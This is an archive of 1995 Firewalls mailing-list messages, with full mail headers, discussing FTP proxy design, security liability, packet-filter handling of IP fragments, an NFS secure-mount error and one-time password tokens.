the work. The only commands that ftp-igw handles relate to PORT commands, all others are passed through to ftp-ogw. PORT commands are handled thus: ftp-igw does the usual checks and then records the client's port number. It then sends a dummy PORT command to ftp-ogw. ftp-ogw binds a port and sends its own PORT command to the remote ftpd. When it receives the callback, it binds another (reserved if possible) port and sends a PORT command back to ftp-igw. ftp-igw gets the PORT command from ftp-ogw, calls it, and then calls back to "client" using a reserved port if possible. Note that we established all connections as outgoing calls through the choke router. From firewalls-owner Wed May 10 06:39:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17221 for firewalls-outgoing; Wed, 10 May 1995 06:30:06 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA17208 for ; Wed, 10 May 1995 06:30:01 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA21179; Wed, 10 May 95 09:15:12 -0400 Date: Wed, 10 May 95 09:15:12 -0400 Message-Id: <9505101315.AA21179@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Liable for Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian rites: >Therefore a court may take the view that a company which has already >considered, or adopted, technology such as a firewall already admits >knowledge of all potential risks and has accepted responsibility for >preventing them. The result could then be that in two actions which are >functionally similar, the company which did not take any risk management >actions suffers less than the company which spent a fortune on risk >reduction technology that did not prevent the incident. Still not allowed to have an opinion but would seem that if the sewer could show that the sooie (or some responsible individual) did know of the risks (and subscription to the FIREWALLs list might be an indication) then the effect would be reversed. "Shoulda knowed" is the "culpable" part. Does sound like high comedy though. Can see the solicitor advising a client: "Now here we need to prove that you, the CIO of a sucessful multi-billion dollar company, are an idiot." Warmly, Padgett From firewalls-owner Wed May 10 07:09:19 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17975 for firewalls-outgoing; Wed, 10 May 1995 06:56:18 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA17970 for ; Wed, 10 May 1995 06:56:15 -0700 Posted-Date: Wed, 10 May 1995 09:56:49 -0400 From: "Bryan D. Boyle" Message-Id: <9505100956.ZM10510@maverick.erenj.com> Date: Wed, 10 May 1995 09:56:49 -0400 In-Reply-To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) "Liable for Security" (May 10, 9:15am) References: <9505101315.AA21179@uvs1.orl.mmc.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.0 06sep94) To: firewalls@greatcircle.com Subject: Re: Liable for Security Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On May 10, 9:15am, A. Padgett Peterson, P.E. Information Security wrote: > Does sound like high comedy though. Can see the solicitor advising a client: > "Now here we need to prove that you, the CIO of a sucessful multi-billion > dollar company, are an idiot." Or, perhaps not high comedy. ;) Depends on the company, and who is the CIO, eh? I would posit that the CIO of a company at some level of "largeness" would be relatively clueless about the *precise* risks, exposures, etc. of his/her/its organization. You probably don't get to be CIO by being on a tech weenie career path, or internal audit teams, which is where the understanding of this usually resides. -- Bryan D. Boyle |The Moving Finger writes,and having writ, moves on. #include |Nor all your Piety nor Wit can call it back to cancel EMAIL: bdboyle@erenj.com |Half a line, or all your tears wash out a Word of it. -------------------- From firewalls-owner Wed May 10 07:24:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17920 for firewalls-outgoing; Wed, 10 May 1995 06:54:38 -0700 Received: from virtual.office.com (welcome.vo.com [204.192.49.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA17910 for ; Wed, 10 May 1995 06:54:34 -0700 Received: (from alex@localhost) by virtual.office.com (8.6.12/8.6.12) id JAA01748; Wed, 10 May 1995 09:56:12 -0400 Date: Wed, 10 May 1995 09:56:12 -29900 From: "S. Alexander Jacobson" Subject: Re: Liable for security To: Todd Vander Does cc: Firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There are many different angles, but the basic question is whether or > not there is a real risk of being held liable for damage done by elicit > changes to the company's computer system. > Does anyone know of relevant cases? > Can anyone refer me to useful reference material? I forwarded your post to Henry Dinger a lawyer at Goodwin, Proctor and Hoar in Boston. He represents companies like ziff and at&t in their online business. Mail him directly for more information. Here is his short reply to your query. ----- From hdinger@gph.com Wed May 10 09:50:46 1995 Date: Wed, 10 May 95 07:03:32 From: hdinger@gph.com To: "S. Alexander Jacobson" Subject: Re: Liable for security (fwd) Alex-- [irrelevant stuff deleted] The question is an interesting one. I doubt there are many cases considering the issue. The company may be liable for an employee's posting of "offensive material" just as it may be liable for an employee's negligent driving of a company car on company business. It depends on whether the employee was acting as a company employee. The company's responsibility for the effects of a cracker's mischief is more complicated. If it distributed virus-infected software, it may have breach of warranty liability to its customers even though it may not have been negligent in failing to catch the infection. The distribution of copyrighted material presents an issue similar in some respects to the *Playboy v. Frena* case, where a BBS sysop was found liable for copyright infringement where a subscriber posted copyrighted images, even though the sysop claimed not to know the uploads were copyrighted. The result might be different if the company did not invite others to upload materials. --Henry From firewalls-owner Wed May 10 07:40:48 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA18716 for firewalls-outgoing; Wed, 10 May 1995 07:33:41 -0700 Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA18708 for ; Wed, 10 May 1995 07:33:36 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id IAA05652; Wed, 10 May 1995 08:33:20 -0600 Date: Wed, 10 May 1995 08:33:20 -0600 From: Danny Boulet Message-Id: <199505101433.IAA05652@nahanni.BouletFermat.ab.ca> To: avalon@coombs.anu.edu.au, danny@nahanni.bouletfermat.ab.ca Subject: Re: IP Packet Filtering Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed says: > In some mail from Danny Boulet, they said: > [...] > > I will concede that, in theory, this implementation is broken (i.e. it could > > reject a packet that shouldn't be rejected). I contend that, in practice, > > the implementation is correct since packets aren't fragmented into pieces > > that > > are so small that the TCP flags appear in the second fragment. If someone > > sends you fragments that are so short that the TCP flags don't make it into > > the first fragment then either the sender is trying to do something weird > > or it is going to take an absurd number of fragments to get any reasonable > > amount of data through to you. > > In practice, I've done it. > > If I can do it, then crackers can do it. And have probably been doing > it for longer than I have. Crackers *ARE* going to try and do weird > things. It is the job of the firewall software to deal with and > neutralise this threat. > > Depending on how your firewall package behaves, I may have to fragment > many packets or just a few. > > And I may not need to send a lot either. How many packets did "mitnick" > need to send in order to get his IP spoofing attack to work ? > > darren > Just to be clear, v2.0 of my ipfirewall package deals with this threat by rejecting the first fragment of a fragmented packet if the fragment is too small to determine whether or not a filter should match. This effectively rejects the entire packet since the destination host won't be able to reassemble the packet. It does this because I believe that it is better to err on the side of paranoia when it comes to playing the Internet security game. One point that I missed in my first posting is that ipfirewall doesn't attempt to match a filter to tail fragments (I define a tail fragment as a fragment other than the first) if the filter is checking either port numbers or the TCP connection flags. This could result in these tail fragments getting through when they shouldn't. On the other hand, the head fragment will be checked. If it gets rejected by the firewall host then the tail fragments will eventually be discarded by the destination host. Note that it is possible in this scenario to launch a denial of service attack on the destination host by flooding it with tail fragments. My user's guide suggests that you either block all fragments if you are worried about this denial of service attack or that you allow in all tail fragments if you aren't and let the normal head fragment checking determine which of these tail fragments can ever be reassembled into complete packets. From firewalls-owner Wed May 10 08:15:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA18916 for firewalls-outgoing; Wed, 10 May 1995 07:39:40 -0700 Received: from math.ams.org (MATH.AMS.ORG [130.44.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA18910 for ; Wed, 10 May 1995 07:39:36 -0700 Received: from sol08.ams.org by MATH.AMS.ORG (PMDF #7286 ) id <01HQC2P3997K95N3GX@MATH.AMS.ORG>; Wed, 10 May 1995 10:39:44 EST Received: by sol08.ams.org (4.1/SMI-4.1) id AA16971; Wed, 10 May 95 10:39:35 EDT Date: 10 May 1995 10:39:34 -0300 (BST) From: Todd Vander Does Subject: Re: Liable for security In-reply-to: Your message of Wed, 10 May 1995 09:56:12 -29900 To: "S. Alexander Jacobson" Cc: Todd Vander Does , Firewalls@GreatCircle.COM Message-id: Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks, this is a solid beginning. I appreciate your efforts and will let you know if I produce anything useful. Todd From firewalls-owner Wed May 10 08:40:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19202 for firewalls-outgoing; Wed, 10 May 1995 07:46:38 -0700 Received: from nahanni.BouletFermat.ab.ca (dboulet.ccinet.ab.ca [198.161.96.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19197 for ; Wed, 10 May 1995 07:46:30 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id IAA05681; Wed, 10 May 1995 08:46:16 -0600 Date: Wed, 10 May 1995 08:46:16 -0600 From: Danny Boulet Message-Id: <199505101446.IAA05681@nahanni.BouletFermat.ab.ca> To: amolitor@anubis.network.com, firewalls-digest@greatcircle.com Subject: Re: IP packet filtering... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Andrew Molitor says: > > What I've done for the packet filtering work I am doing is this: > > Any pattern which requires data not present in the datagram >in hand does not match. Thus, if the TCP flags are not in the first >datagram, a filter of the form: > > .. stuff .. > tcp_connect_request ; > .. stuff .. > > will not do to the first fragment, since it is logically >NOT a tcp_connect_request. The flags will show up in, say, the 2nd frag, >whereupon if the SYN is set and the ACK is not, the actions will be >taken with respect to that packet. > > This seemed to me to be the easiest solution, it's relatively easy to >use an abstraction that understands the idea of 'Nth byte after the beginning >of the transport layer header' and to teach that abstraction about fragments >is a no-brainer, so we handle flags by simply asking for the 13th byte, and >if it's not there, the answer to all questions about that byte ('is it >between 0 and 255?' 'is the 3rd bit set?') is 'no'. > > I think this does make the semantics a little complicated, but not >any more complicated than anything else -- the fact is that IP fragments >and you have to deal with that if you don't want to do reassembly just >to filter. > > Andrew > I may be missing something but this doesn't seem to work. What do you do if the filter requires data that is spread between two different fragments? For example, let's assume that you have a filter that is supposed to reject any packets that are being sent to a particular TCP/IP port and which are TCP connection requests. The vandal fragments his TCP/IP packets so that the TCP port numbers always appear in one fragment and the TCP flags needed to do the connection request checking appear in another. Are you saying that your scheme would not apply the filter to either fragment (since neither fragment contains all of the data required to do the match)? If so then your scheme would seem to allow such fragments through (i.e. a vandal could defeat you by sending carefully crafted fragments). From firewalls-owner Wed May 10 09:29:06 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA19985 for firewalls-outgoing; Wed, 10 May 1995 08:19:12 -0700 Received: from eden.eecs.nwu.edu (eden.eecs.nwu.edu [129.105.5.60]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA19980 for ; Wed, 10 May 1995 08:19:06 -0700 Received: by eden (8.6.11/8.6.11) id BAA02833; Wed, 10 May 1995 01:02:11 -0500 Date: Wed, 10 May 1995 01:02:11 -0500 From: Robert Bonomi Message-Id: <199505100602.BAA02833@eden> To: fc@all.net Subject: Re: impossible vs. impractical Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From owner-bugtraq@fc.net Tue May 9 17:55:24 1995 Received: from sprawl.fc.net by delta.eecs.nwu.edu (8.6.12/8.6.12) with ESMTP id RAA25223 for ; Tue, 9 May 1995 17:55:21 -0500 Received: from freeside.fc.net (freeside.fc.net [198.6.198.2]) by sprawl.fc.net (8.6.10/8.6.10) with ESMTP id FAA15664 for ; Mon, 8 May 1995 05:46:25 -0500 Received: (from majordom@localhost) by freeside.fc.net (8.6.8.1/8.6.6) id FAA24207 for bugtraq-outgoing; Mon, 8 May 1995 05:48:27 -0500 Received: from all.net (all.net [204.7.229.1]) by freeside.fc.net (8.6.10/8.6.6) with SMTP id FAA24195 for ; Mon, 8 May 1995 05:48:20 -0500 From: fc@all.net (Dr. Frederick B. Cohen) Received: by all.net (4.1/3.2.012693-Management Analytics); id AA07209 for bugtraq@fc.net; Mon, 8 May 95 06:42:48 EDT Message-Id: <9505081042.AA07209@all.net> Subject: Re: impossible vs. impractical To: mcn@EnGarde.com (Mike Neuman) Date: Mon, 8 May 1995 06:42:47 -0400 (EDT) Cc: bugtraq@fc.net In-Reply-To: <199505080429.XAA13309@guardian.EnGarde.com> from "Mike Neuman" at May 7, 95 11:29:15 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 946 Sender: owner-bugtraq@fc.net Precedence: bulk Status: R > Oh good. I think possibility has practicality implied. After all, if you > can generate an infinite amount of energy, you CAN go the speed of light > (according to the current laws of physics), so there, it's not impossible. But according to current physics, there is a finite amount of total energy in the Universe, and thus it is impossible to get the infinite energy required to do this - again, impossible, not infeasible. WRONG! the 'total energy in the universe is finite' is an UNPROVEN assumption. I'll grant 'consistant with the currently-held *theories*', but that's all. Those 'thoeries' are just that, however THEORIES, and by their very nature *un-provable* in a formal sense. They are accepted *only* because no one has _yet_ come up with a 'dis-proof by counter-examble'. From firewalls-owner Wed May 10 09:30:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20109 for firewalls-outgoing; Wed, 10 May 1995 08:26:51 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA20097 for ; Wed, 10 May 1995 08:26:47 -0700 Message-Id: <199505101526.IAA20097@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA020069742; Thu, 11 May 1995 01:29:02 +1000 From: Darren Reed Subject: IP Filter 2.6 To: firewalls@greatcircle.com Date: Thu, 11 May 1995 01:29:02 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 743 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've just finished work on version 2.6 of my IP filter and I'm almost 100% happy with fragment handling - although it hasn't really changed since 2.5. For more details, see: http://cheops.anu.edu.au/~avalon/ip-filter.html ftp://coombs.anu.edu.au/pub/net/kernel/ip_fil2.6.tar.gz (Please add this to the lists currently circulating). To any 'newcomers', this is an IP Filtering package which can be used to help build a firewall and runs on SunOS 4.1.x, NetBSD and (?) FreeBSD/BSDI. ...the % that isn't happy with fragment handling is that depending on the reassembly implementation, it may or may not be safe to filter on "established" (or any other) bits in the TCP header, regardless of whether they are present or not. Cheers, Darren From firewalls-owner Wed May 10 09:47:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21222 for firewalls-outgoing; Wed, 10 May 1995 09:21:19 -0700 Received: from aguila.dpi.udec.cl (aguila.dpi.UDEC.CL [152.74.16.12]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21217 for ; Wed, 10 May 1995 09:21:14 -0700 Received: from [152.74.18.100] by aguila.dpi.udec.cl (AIX 3.2/UCB 5.64/4.03) id AA26808; Wed, 10 May 1995 12:23:05 -0600 Received: by ing.udec.cl (5.x/SMI-SVR4) id AA05996; Wed, 10 May 1995 12:18:58 -0400 From: claudio@ing.udec.cl (Claudio Baeza R.) Message-Id: <9505101618.AA05996@ing.udec.cl> Subject: share -F nfs -o secure doesn't work... To: firewalls@greatcircle.com Date: Wed, 10 May 1995 12:18:56 -0400 (CST) Cc: webmaster@sun.com X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi When I try to share a directory with the secure option, it doesn't work. root-server1>share -F nfs -o secure /dir root-client1>mount -F nfs server1:/dir /dir NFS getattr failed for server canelo: RPC: Authentication error nfs mount: mount: /dir: I/O error root-client2>mount -F nfs -o secure server1:/dir /dir NOTICE: authdes_refresh: unable to synchrize with server NOTICE: authdes_refresh: unable to encrypt conversation key WARNING: authget: authdes_create failed: Invalid argument WARNING: clget: authget failed (scanning chtable): Invalid argument nfs mount: mount: /dir: Invalid argument Notice: 1.- I am using NIS+ and Solaris2.4, rcpnisd running with default option (DES=2 , -Y). 2.- The archive nsswitch.conf is the following: # # /etc/nsswitch.nisplus: # # An example file that could be copied over to /etc/nsswitch.conf; it # uses NIS+ (NIS Version 3) in conjunction with files. # # "hosts:" and "services:" in this file are used only if the # /etc/netconfig file has a "-" for nametoaddr_libs of "inet" transports. # the following two lines obviate the "+" entry in /etc/passwd and /etc/group. passwd: files nisplus group: files nisplus # consult /etc "files" only if nisplus is down. #hosts: nisplus [NOTFOUND=return] files #Uncomment the following line, and comment out the above, to use both DNS #and NIS+. You must also set up the /etc/resolv.conf file for DNS name #server lookup. See resolv.conf(4). hosts: files nisplus dns [NOTFOUND=return] services: nisplus files [NOTFOUND=return] networks: nisplus files [NOTFOUND=return] protocols: nisplus files [NOTFOUND=return] rpc: nisplus files [NOTFOUND=return] ethers: nisplus files [NOTFOUND=return] netmasks: nisplus files [NOTFOUND=return] bootparams: files nisplus publickey: nisplus netgroup: nisplus automount: files nisplus aliases: files nisplus sendmailvars: files nisplus If someone know a solution please sendmail claudio@ing.udec.cl Thank in advance atte Claudio... From firewalls-owner Wed May 10 10:31:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20423 for firewalls-outgoing; Wed, 10 May 1995 08:43:40 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA20412 for ; Wed, 10 May 1995 08:43:35 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA22058; Wed, 10 May 95 11:37:43 -0400 Date: Wed, 10 May 95 11:37:42 -0400 Message-Id: <9505101537.AA22058@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "bdboyle@erenj.com"@UVS1.dnet.mmc.com Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Liable for security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >I would posit that the CIO of a company at some level of "largeness" would be >relatively clueless about the *precise* risks, exposures, etc. of his/her/its >organization. Agree but this becomes less of a defense when the Internet security issue is on the front cover of a management oriented magazine like Information Week (12 Dec. 1994) or even Newsweek (Feb. 27, 1995). To be clueless, (s)he would have to be illiterate. P.fla From firewalls-owner Wed May 10 11:22:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20975 for firewalls-outgoing; Wed, 10 May 1995 09:14:07 -0700 Received: from raksha.atlanta.com (raksha.atlanta.com [155.229.1.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20969 for ; Wed, 10 May 1995 09:14:02 -0700 Received: from mjsus.atlanta.com (mjsus.atlanta.com [155.229.129.103]) by raksha.atlanta.com (8.6.9/8.6.9) with SMTP id MAA05071 for ; Wed, 10 May 1995 12:16:22 -0400 Message-Id: <199505101616.MAA05071@raksha.atlanta.com> X-Sender: mjsus@pop.atlanta.com X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 May 1995 11:12:38 -0400 To: firewalls@greatcircle.com From: mjsus@atlanta.com (Markku Saarelainen) Subject: Real Case: 0.01 % probability Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All electronic firewalls are necessary and important, but so are the physical firewalls as a part of an overall Information Security System. The information security incidents may also happen by accident as the following case example describes: -------------------------------------------------------------------------------- A real case example: This is the real case and it happened in a small size business organization a couple of weeks ago. The estimated probability of this incident happening was 0.01 %. The result of this incident was that 5 % of the most important business information was deleted causing 100 hours of extra work and the unnecessary business interruption. The Business Analyst and Developer was adhering to the Information Security Program as described in the Information Security System Manual. This program establishes basic elements for the information backup, information access protection, activity logs and any other information security related matters. The Information Security System was to ensure that no unauthorized access was possible and the information was protected. However, as the "Murphy's Law" says "what can happen, it will happen" as it happened. The Business Analyst left for a 20 minute break and did not turn the computer off and left the most important files open in the database program. This person had never before left these files open and has always turned off the computer when he has left his work. However, for one reason or another, he did not do this at this time - and then things started happening !!!!! The computer's electricity was connected to the switch that can be turned off and on by the person in the Business Analyst's office room. This switch shall also turn off the lights in the room. During the 20 minute break, somebody had entered into the Business Analyst's room and turned off the switch, which, of course, then turned off the computer (closing all files that were open in the computer) and the room lights. After the 20 minute break (the 20-minute time window) the Business Analyst returned back to the room and found out that all electricity was off and the computer was also turned off. Quickly, the Business Analyst turned on all electricity and the computer and started checking the system for any potential and actual damages. And soon the person identified that the most important file (that was left open) was actually corrupted and 20 % of the important information was gone (the estimation - a 2 months effective work). The Business Analyst had turned off the computer several times before, when the same files have been open, and the files have never become corrupted. This case was different. Fortunately, 75 % of the damaged and deleted data were backed up and recoverable, and the total damage was only the 5 % loss of the important information. Was this damage caused by somebody deliberately? After careful analysis, the only possible answer is "NO". The incident happened purely by accident and was caused by many small, but very meaningful, coincidents that happened perfectly at the same time - coincidentally and unfortunately. And the main cause of this particular incident was a pure human error / mistake. However, the incident caused the company to analyze its "bullet proof" Information Security System again and to reengineer this system to prevent any similar damages happening again in the future. -------------------------------------------------------------------------------- As this example shows the structured and organized Information Security System can prevent potential damages in an overall information system, and without the Information Security System the probability of these damages happening is much higher. ***************************************************************** Markku J. Saarelainen Tel: U.S.A-(404)-998-7855 P.O.Box 1672 FAX: U.S.A-(404)-998-7855 Roswell, GA 30077, USA Email: mjsus@atlanta.com DISCLAIMER No thought written in this message is a statement of any organization by which I am employed or for which I work. ***************************************************************** From firewalls-owner Wed May 10 12:21:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA25956 for firewalls-outgoing; Wed, 10 May 1995 12:03:58 -0700 Received: from riverside.mr.net (Riverside.MR.Net [137.192.2.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA25944 for ; Wed, 10 May 1995 12:03:52 -0700 Received: from mail.carlson.com by riverside.mr.net (8.6.12/SMI-4.1.R931202) id OAA22611; Wed, 10 May 1995 14:04:21 -0500 Received: by mail.carlson.com with Microsoft Mail id <2FB12A38@mail.carlson.com>; Wed, 10 May 95 14:03:52 PDT From: "Anderson, Jeremy" To: firewalls Subject: Re: impossible vs. impractical Date: Wed, 10 May 95 13:58:00 PDT Message-ID: <2FB12A38@mail.carlson.com> Encoding: 70 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For Pete's SAKE! Can we TRY to keep the conversation at least TANGENTIALLY related to firewalls? I'm trying to learn about this stuff, and it seems that about 85% of the people with anything to do with firewalls have nothing better to do than _mindlessly_ debate silly little points. Signal to noise ratio is WAY low, thanks to mindless quibbling like this! And do we have to cc: to firewalls? Are you that sure we're interested in it? Flame me all you like, but do it to my PRIVATE email. Btw, do we have to quote FULL message headers? ---------- From: firewalls-owner To: fc Cc: firewalls Subject: Re: impossible vs. impractical Date: Wednesday, May 10, 1995 1:02AM [Header deleted] > Oh good. I think possibility has practicality implied. After all, if you > can generate an infinite amount of energy, you CAN go the speed of light > (according to the current laws of physics), so there, it's not impossible. But according to current physics, there is a finite amount of total energy in the Universe, and thus it is impossible to get the infinite energy required to do this - again, impossible, not infeasible. WRONG! the 'total energy in the universe is finite' is an UNPROVEN assumption. I'll grant 'consistant with the currently-held *theories*', but that's all. Those 'thoeries' are just that, however THEORIES, and by their very nature *un-provable* in a formal sense. They are accepted *only* because no one has _yet_ come up with a 'dis-proof by counter-examble'. __________________ "So there!" This is very appropriate for a discussion which is beginning to sound like a playground brawl. btw, not everyone is using a unix-based mailer. Much against my will, I'm using MSMail, which only shows the sender as 'Firewalls-owner.' PLEASE put a sig or some type of identification after your letter! If you don't, some of us may have no idea who/what/where you are! ;) Obligatory Firewall Reference: Does anyone know of firewalls to run under A/UX? Jeremy Anderson VRU Analyst/Defacto Unix Admin u02iv34@cci.nwhq1.carlson.com HIGHLY PROFANE and NASTY flames to: obrenov@winternet.com (my personal account) ---I am in NO way a representative of Carlson Companies. Anything I say is completely and totally coincidental. If, at any time, you begin to think that I represent CCI, please remember--you are wrong. From firewalls-owner Wed May 10 13:08:14 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26628 for firewalls-outgoing; Wed, 10 May 1995 12:38:05 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA26623 for ; Wed, 10 May 1995 12:37:59 -0700 Received: from [198.115.177.204] (slip-0-4.shore.net) by northshore.ecosoft.com with SMTP id AA21468 (5.67a/IDA-1.5 for ); Wed, 10 May 1995 15:38:17 -0400 Message-Id: <199505101938.AA21468@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 9 May 1995 14:43:19 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: One Time Password Tokens Cc: stewsg@delphi.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The Estimable Padgett opined: >The time synchronous are the easiest to use, just read off a >number and type it in plus a PIN, the biggest problem being >drift and a "window of operation" that could be exploited. >Challenge/response are a bit more cumbersome to use - has a >calculator-like keypad, you enter a PIN+challenge, push a >button, and then type in the response. I don't know about RPG and ActivCard, but time/secret-key tokens based on Weiss' patents (SecurIDs) don't have a big (security) problem with either drift or the "window of vulnerability." That's a lot marketing fluff. (The cost of two-factor tokens remains the real limitation on widespread use of tokens.) * Drift: Weiss' core patents addresses the dynamic synchronization of the clocks in the authentication server and a specific card. With the server clock assumed as accurate, the SecurID server keeps a record of the apparent drift of every card. A user's PIN+Card-code message must match that expected at the server -- or be off by only one "time-unit" (30 sec. or 1 min) fore or aft. * Window: For a single server, the SecurID record is locked with the initial contact. For the fraction of card-holders registered on multiple servers, SDI has always sold a 3-seed card that allows a single PIN to be used on all three servers, since -- clicking the card -- each card-code sequence will be unique to that server. Alternatively, different PINs can be used (each for a different server) with a single card. In short, few leave a window open -- none have to. * Extended Drift: When a card is not used for an extended period, the drift of the card-clock can wander more than one time-slot (slower or faster) from what the server expects -- even when the server has a record of the card's previous drift. In that case, the server extends the window, successively, to five, seven, nine, twelve time-slots, trying to match the SecurID code, adjusted for time drift. When it finds a match, it then demands the next successive card-code to validate the access request. Within client/server milieu, these defenses are butressed by additional security within the SecurID call packet created by the client, which includes an encrypted IP address. A packet captured or spoofed and re-transmitted from another IP address would be denied and would set off alarms. >Recently two companies using challenge-response technology >(Enigma-Logic and Secure Computing) have introduced the >next logical step, software based tokens. In each, software is >running in the background on the user's computer that >recognizes when a challenge is received and pops up a window >for the user to enter her/his/etc. PIN. The process is then >handled entirely in the background. >As a result the PC becomes the token and no external hardware >is necessary. Further the cost is tied to software on the host >computer, token cost for the individual users can become zero >(and has in one case). (PS. Digital Pathways also has a soft token.) No one can argue with the attractive economics of the "soft token;" but S/key economics are even better, aren't them? Both are light-years more secure than the naked norm... but are they two-factor authenticators? There were statistics circulating, years back, that documented an enormous difference between the security of one-factor authentication (something known) and two factor (something known, something held, or something inherent in the person: a biometric) IDs. Since then, the marketing guys always stretch an argument to claim 2-factor ID authentication. A classicist would debate Padgett's reference to the PC as a ID token. Traditional usage defines a token as something "personal, tangible, and uncounterfeitable." A software product is seldom hard to copy, whatever its defenses. Also, existing "soft tokens" seem to hold both the C/R secret key and the (hashed) PIN in software, making it a much more attractive target for an attacker. The user uses his PIN to get access to the secret key, which in turn is used to encrypt a challenge from the server. In most challenge/response protocols (Enigma's, e.g.) the encrypted response to the challenge is assumed to be evidence that the PIN was correct -- but the server does not independently validate a user PIN. In fact, it never sees it. The "soft token" -- a great product, which I'd like to see all over -- is a single- factor (something you have) dynamic authenticator. The integrity of this access control system depends upon the physical security of the PCs, which hold in software everything needed to access the system. >The problem with incorporating such a scheme to a time >synchronous operation is that the clock drift on a PC is >notoriously bad. This is a non-issue. The drift of a PC clock is manageable. The real issues that constrain SDI and others from issuing a soft token -- IMHO -- are strategic, competitive, and economic... maybe even ideological;-) >Point is that PIN + PC keeps the two factor authentication >deemed sufficient (something you know - PIN - and something >you have - PC/software). True, software can be copied but there >hould be ways around that limitation and the benefits would >be IMNSHO well worth the additional risk. Besides you can >still have token cards for those "in harms way", this just lets >everyone have them. 